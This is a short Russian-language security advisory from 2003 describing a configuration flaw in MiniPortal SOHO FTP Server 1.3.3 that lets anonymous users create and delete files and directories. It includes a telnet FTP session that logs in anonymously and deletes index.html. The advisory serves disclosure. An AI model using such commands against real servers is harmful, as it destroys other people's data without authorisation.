Создание и удаление произвольных каталогов и файлов в MiniPortal SOHO server

Дата публикации:
04.04.2003
Всего просмотров:
1432
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Уязвимость конфигурации обнаружена в MiniPortal SOHO server. Удаленный авторизованный пользователь, включая анонимного пользователя, может создавать и удалять каталоги и файлы внутри FTP директории. Пример:
>>Telnet 127.0.0.1 21
220 FTP Server, ready
>> USER anonymous
331 Password required
>> PASS anonymous@localhost
230 User logged in
>>MKD test
257 "test" created
>>RMD test
200 Okay
>>DELE index.html
200 Okay
Уязвимость обнаружена в MiniPortal SOHO FTP Server 1.3.3

Ссылки: MiniPortal
или введите имя

CAPTCHA